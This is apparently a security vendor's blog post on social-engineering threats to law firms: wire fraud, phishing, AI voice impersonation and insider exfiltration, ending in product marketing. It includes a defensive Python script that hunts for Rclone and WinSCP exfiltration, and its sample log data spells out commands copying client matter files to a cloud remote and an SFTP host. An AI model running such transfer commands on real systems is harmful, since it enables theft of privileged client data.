The Top User-Driven Cyber Threats Targeting Law Firms
Law firms sit on some of the most sensitive and valuable data in the enterprise, and attackers have built an entire playbook around exploiting the users who handle it. Learn how four dominant threat vectors are targeting legal sector workflows in 2026 and what it takes to stop attacks at the User Layer.


Law firms have become among the most prized targets for cybercriminals, and the reason has little to do with technical vulnerabilities. Attorneys and staff hold corporate trade secrets, unreleased M&A intelligence, intellectual property, and private client records – a combination of data that commands exceptional value on criminal markets. Attackers have recognized that the fastest path into a law firm is not through its perimeter defenses; it is through the users who manage, share, and act on that data every day.
Because law firms are trusted with some of the most sensitive data imaginable, it is no surprise that 36% of them reported experiencing a security incident in 2024 and that the FBI has issued active warnings about organized threat groups specifically targeting the sector. The average cost of a law firm data breach has reached $5.08 million, and the consequences extend well beyond the financial loss.
High-profile incidents demonstrate what a single User Layer failure can trigger inside firm environments. The Grubman Shire Meiselas & Sacks breach triggered a $42 million ransom demand after attackers accessed celebrity contracts and NDAs. The Orrick, Herrington & Sutcliffe compromise exposed the personal information of over 630,000 individuals and resulted in an $8 million settlement. The Gunster Yoakley & Stewart breach allowed attackers to move undetected through the firm's document management system for weeks, ultimately compromising the personal information of 746,000 individuals and resulting in an $8.5 million settlement.
Law firms operate on trust, and that trust has become the primary attack surface. Social engineering attacks, which exploit human behavior rather than technical weaknesses, are the dominant threat vector facing the legal industry today – and the four vectors below highlight where that risk is most concentrated in 2026.

How Attackers Target Law Firm Users
Legal professionals face a distinct set of user-driven threats that exploit the industry’s core dynamics: high-trust client relationships, time-sensitive financial workflows, and a concentration of privileged data that carries far-reaching consequences when exposed. The four vectors below represent the leading attack types targeting law firms today.
Business Email Compromise and Wire Fraud
Business email compromise (BEC) is a cyberattack in which an attacker impersonates a trusted party, such as a client, managing partner, or transaction counterparty, via email to fraudulently redirect payments or extract sensitive information. Attackers typically gain visibility into a firm's email environment through credential theft, dark web markets, or OSINT reconnaissance, then monitor internal communications to identify high-value financial events – retainer payments, settlement disbursements, M&A closings, or escrow releases – before sending fraudulent payment instructions. In account takeover cases, attackers lurk inside compromised inboxes for weeks, familiarizing themselves with vendor relationships, payment processes, and key personnel before acting.
Law firms are structurally ideal BEC targets. They concentrate high-value financial activity inside authorization workflows driven almost entirely by email, and attorneys and paralegals routinely act on last-minute instructions under time pressure – court deadlines, closing dates, client urgency – with little opportunity for independent verification. The FBI's IC3 has documented over $55 billion in global exposed BEC losses over the last decade, including nearly $2.8 billion in 2024 alone. For law firms, where a single fraudulent wire can trigger fiduciary liability and bar disciplinary action on top of the financial loss, the stakes go far beyond the dollar amount.
Spear Phishing and Document Workflow Exploitation
Phishing remains the single most common entry point for cyberattacks against law firms, but the threat has evolved well beyond generic credential harvesting. Inside Access, Dune’s 2025 Insider Threat Intelligence Report found that AI-personalized phishing emails drive three times more user interaction than traditional, templated variants, and in the legal sector, that personalization is devastatingly effective. Using the same OSINT and reconnaissance techniques described above, adversaries craft messages impersonating clients, opposing counsel, court officials, or e-discovery platforms with enough contextual accuracy to bypass scrutiny. A paralegal receiving what appears to be a document review request from a known client, or an associate clicking a link appearing to originate from a court filing system, is acting within entirely normal professional routines. That is precisely what makes the attack effective.
The document-centric nature of legal work creates a heightened phishing surface that does not exist in most other industries. Law firms exchange contracts, NDAs, court filings, due diligence packages, and settlement agreements at high volume, often with external parties not subject to the firm’s own security controls. Attackers exploit this by inserting malicious documents into review workflows, spoofing e-discovery platforms, and embedding credential harvesting links inside routine signature requests. The FBI has also warned of active fake prospective client schemes targeting law firm intake teams with fraudulent engagement documents that appear legitimate until credentials are compromised.
GootLoader, a malware delivery framework that has been actively targeting legal professionals since 2020 and continues to evolve through 2026, has seeded malicious content linked to 3.5 million search terms – a high percentage of which are legal terms. Document exploitation here requires no email, no phone call, and no direct contact whatsoever. An attorney or paralegal searching for a specific contract template or legal filing may find a GootLoader-infected file sitting at the top of their search results, indistinguishable from a legitimate source, exploiting only the reasonable assumption that a top search result can be trusted.

Vishing and AI-Powered Voice Impersonation
Voice phishing (vishing) attacks surged 442% in 2025 as AI voice cloning lowered the barrier to high-quality impersonation, with global losses from deepfake-enabled voice fraud exceeding $200 million in the first quarter of 2025 alone. Law firms are particularly susceptible: attorney names, titles, client relationships, and even communication styles are often publicly accessible through firm websites, LinkedIn, and court records, giving attackers everything they need to build a credible pretext before making a single call.
Luna Moth, also tracked as Silent Ransom Group, is among the most active threat groups targeting the legal sector through this vector. In March 2025, the FBI's Cyber Division issued a warning to U.S. law firms about a targeted campaign in which the group evolved from callback phishing to direct vishing calls, impersonating IT personnel to convince employees to establish remote access sessions under the pretext of a fabricated technical issue. Between April 2024 and April 2025, the legal sector accounted for more than 40% of Luna Moth's documented victims, with ransom demands ranging from $1 million to $8 million per incident. Once access is granted, the group exfiltrates data silently using legitimate tools like WinSCP and Rclone, rarely triggering security alerts.
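Because the exfiltration step above uses legitimate transfer tools, detection has to come from context (who ran the tool, from where, and toward what destination) rather than from a malware signature. As an added example that is not Dune Security's code, the following Python hunts constructed process-creation events for Rclone and WinSCP invocations that push data to a remote outside an allow-listed backup context; the pipe-delimited log layout, host and account names, and the allow-list are all assumptions.

```python
"""Hunt constructed process-creation events for the exfiltration tooling named in the
Luna Moth paragraph (Rclone, WinSCP). Added example; log layout and allow-list are assumed."""
import re
from collections import namedtuple

# Constructed sample events: timestamp|host|user|parent_image|image|command_line
SAMPLE_EVENTS = r"""
2025-03-11T09:02:14Z|WS-ASSOC-17|jdoe|explorer.exe|WINWORD.EXE|"C:\Program Files\Microsoft Office\WINWORD.EXE" Brief.docx
2025-03-11T09:41:07Z|WS-PARA-04|mlee|cmd.exe|rclone.exe|rclone.exe copy "C:\Matters\Acme_v_Beta" cloud:docs --transfers 16 --config C:\Users\Public\r.conf
2025-03-11T10:05:33Z|WS-PARA-04|mlee|powershell.exe|WinSCP.com|WinSCP.com /command "open sftp://u@203.0.113.10/" "put C:\Matters\*.pdf /in/" "exit"
2025-03-11T10:07:51Z|FS-DMS-01|svc_backup|backup_agent.exe|rclone.exe|rclone.exe sync D:\DMS\export offsite:dms-backup --config C:\ProgramData\Backup\rclone.conf
"""

Alert = namedtuple("Alert", "timestamp host user tool reason")

# (host, user) pairs where scripted transfers are a known backup job (constructed allow-list).
APPROVED_TRANSFER_CONTEXTS = {("FS-DMS-01", "svc_backup")}
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# An rclone remote looks like `name:path`; a drive letter followed by \ or / is not one.
RCLONE_REMOTE = re.compile(r"(?<![\w\\/])([A-Za-z][\w-]*):(?![\\/])")
WINSCP_SCRIPT_SWITCH = re.compile(r"/(command|script)\b", re.IGNORECASE)

def parse_event(line):
    ts, host, user, parent, image, cmd = line.split("|", 5)
    return {"ts": ts, "host": host, "user": user, "parent": parent,
            "image": image.lower(), "cmd": cmd}

def classify(ev):
    # Expected backup jobs are suppressed; everything else is judged on tool + arguments.
    if (ev["host"], ev["user"]) in APPROVED_TRANSFER_CONTEXTS:
        return None
    tokens = ev["cmd"].split()
    verb = tokens[1] if len(tokens) > 1 else ""
    if (ev["image"] in ("rclone.exe", "rclone") and verb in RCLONE_TRANSFER_VERBS
            and RCLONE_REMOTE.search(ev["cmd"])):
        return Alert(ev["ts"], ev["host"], ev["user"], "rclone",
                     f"'{verb}' to a cloud remote, spawned by {ev['parent']}")
    if ev["image"] in ("winscp.com", "winscp.exe") and WINSCP_SCRIPT_SWITCH.search(ev["cmd"]):
        return Alert(ev["ts"], ev["host"], ev["user"], "winscp",
                     f"scripted transfer spawned by {ev['parent']}")
    return None

def hunt(log_text):
    # Run every event through classify() and keep the alerts in log order.
    return [a for a in map(classify, map(parse_event, log_text.strip().splitlines())) if a]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(f"{a.timestamp} {a.host} {a.user}: {a.tool} - {a.reason}")
```

On the sample data the Word launch and the service-account backup sync are ignored, while the two transfers run by an interactive user on a workstation are surfaced for review.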
Broader vishing campaigns extend well beyond Luna Moth, with AI-generated voice calls impersonating judges, opposing counsel, regulatory bodies, and senior firm leadership becoming an increasingly documented threat across the legal sector. As the cost of a convincing impersonation approaches zero, vishing will only become more frequent and harder to distinguish from legitimate contact. For law firms, where a single call can authorize a wire transfer or expose privileged case strategy, the consequences of a moment's misplaced trust are exceptionally high.
Insider Threats and Lateral Data Exfiltration
Malicious insider attacks are the most expensive breach type to remediate across industries, averaging $4.92 million per incident. Negligent insiders who misconfigure cloud repositories, forward privileged documents to personal accounts, or approve access without verification do not intend harm – but the legal consequences of their decisions are the same. High attrition, lateral movement across systems, and fluid client portability all create persistent data exfiltration risk for the legal industry that legacy tools cannot address.
Once internal access is exploited – whether through malicious intent, negligence, or a compromised credential – lateral movement expands across case management systems, shared drives, and client portals, compounding the scope of exposure well beyond the initial point of compromise. The Proskauer Rose cloud misconfiguration incident, in which 184,000 privileged client files were accessible via a public URL for six months without detection, reflects how consequential routine access and workflow decisions can be when made without security awareness. In a law firm context, that data is not just sensitive; it is legally protected, subject to bar association obligations, and deeply consequential to ongoing litigation or deal processes if compromised.

Building Resilient Defenses for the Modern Law Firm
The legal sector’s threat landscape has fundamentally changed, and the defense model has to change with it. Annual courses and periodic phishing simulations do not address BEC attacks engineered around the firm’s own wire approval workflows, AI-generated impersonation of known clients, active FBI-warned vishing campaigns, or the behavioral signals that precede insider-driven data exfiltration. A firm whose security posture relies on annual training for a workforce that changes continuously through lateral hires, departures, and secondments is not managing user risk. It is checking compliance boxes.
Every user inside a law firm carries a different risk profile. A first-year associate processing routine correspondence, a senior partner approving client fund transfers, a billing coordinator managing vendor invoices, and an IT administrator with elevated system access are not the same target, and cannot be given the same risk remediation pathways. The real attack surface has always been the User Layer: the judgment calls made under pressure, the approvals given to external parties, the access held by someone who submitted their resignation last week. As AI expands both the attack surface and the sophistication of threats, static defenses are not just insufficient – they are obsolete.
Dune Security stops social engineering and insider threat across every channel. Our platform calculates a dynamic risk score for every human and agentic user based on role, behavior, and exposure across five core pillars: business impact, agentic attack simulations, training activity, external security integrations, and historical risk data. Legal security and compliance teams use that score to focus effort on the people who actually drive risk, while targeted interventions protect attorneys, paralegals, and staff without adding friction. High-risk users face escalations including increased User Adaptive Training, access restrictions, and dynamic enforcement. The old playbook is irrelevant. Dune is what’s next for law firm defense.
FAQs
The leading threats targeting law firms include business email compromise (BEC) and wire fraud, spear phishing and document workflow exploitation, AI-powered vishing and voice impersonation, and insider-driven data exfiltration. All four exploit the legal industry’s core dynamics: high-trust client relationships, time-sensitive financial workflows, and the concentration of privileged data that makes a single lapse exceptionally costly.
Law firms are structurally ideal BEC targets because they routinely process large wire transfers on behalf of clients, with authorization workflows driven almost entirely by email. Attackers typically gain access through credential theft or OSINT reconnaissance, monitor compromised inboxes for weeks to map financial workflows and key personnel, then send fraudulent wire instructions timed to high-value events like M&A closings, settlement disbursements, or escrow releases. The FBI Internet Crime Complaint Center reported nearly $2.8 billion in BEC losses in 2024, with law firms highly exposed given the volume of high-value transactions attorneys process on behalf of clients. When a fraudulent instruction succeeds, the consequences extend beyond the financial loss: a single approved wire fraud can trigger fiduciary liability, malpractice claims, and bar disciplinary action.
Luna Moth, also tracked as Silent Ransom Group, is an organized threat group that the FBI has specifically warned U.S. law firms about. The group evolved from callback phishing campaigns – in which attackers posed as IT support to convince employees to install remote access tools – to direct AI-assisted vishing calls impersonating IT personnel. Between April 2024 and April 2025, the legal sector accounted for more than 40% of Luna Moth’s documented victims, with ransom demands ranging from $1 million to $8 million per incident. Once access is established, the group exfiltrates data silently using legitimate tools like WinSCP and Rclone, rarely triggering security alerts, meaning the attack surface is entirely the user’s judgment under pressure.
AI has removed the quality ceiling that once constrained social engineering at scale. AI-generated phishing emails now replicate managing partner tone, reference active matters by name, and mirror established client communication styles, removing the linguistic signals that even trained users historically relied on to flag suspicious messages. Voice cloning enables convincing audio impersonation from seconds of publicly available audio, a particular risk in an industry where attorney names, communication styles, and professional relationships are extensively documented in public court records and firm websites. Dune’s 2025 Insider Threat Intelligence Report found that AI-personalized phishing emails drive three times more user interaction than templated variants. As generation quality continues to improve, the gap between a legitimate communication and a synthetic one will continue to narrow, making behavioral visibility at the User Layer the only reliable early warning.
Dune stops social engineering and insider threat across every channel by treating user risk the way a bank treats credit. It calculates a dynamic risk score for every attorney, paralegal, and staff member based on five pillars: business impact, agentic attack simulations, training activity, external security integrations, and historical risk data. Instead of chasing vanity metrics like completion rates, that score drives real decisions. Security teams use it to focus effort on the users who actually drive risk. Leaders see it in automated executive reporting. And employees experience targeted interventions that protect them without adding friction. In a law firm environment, that means the senior partner approving a wire transfer, the associate clicking a document request, and the IT administrator with elevated access are each scored and protected differently, all in real time.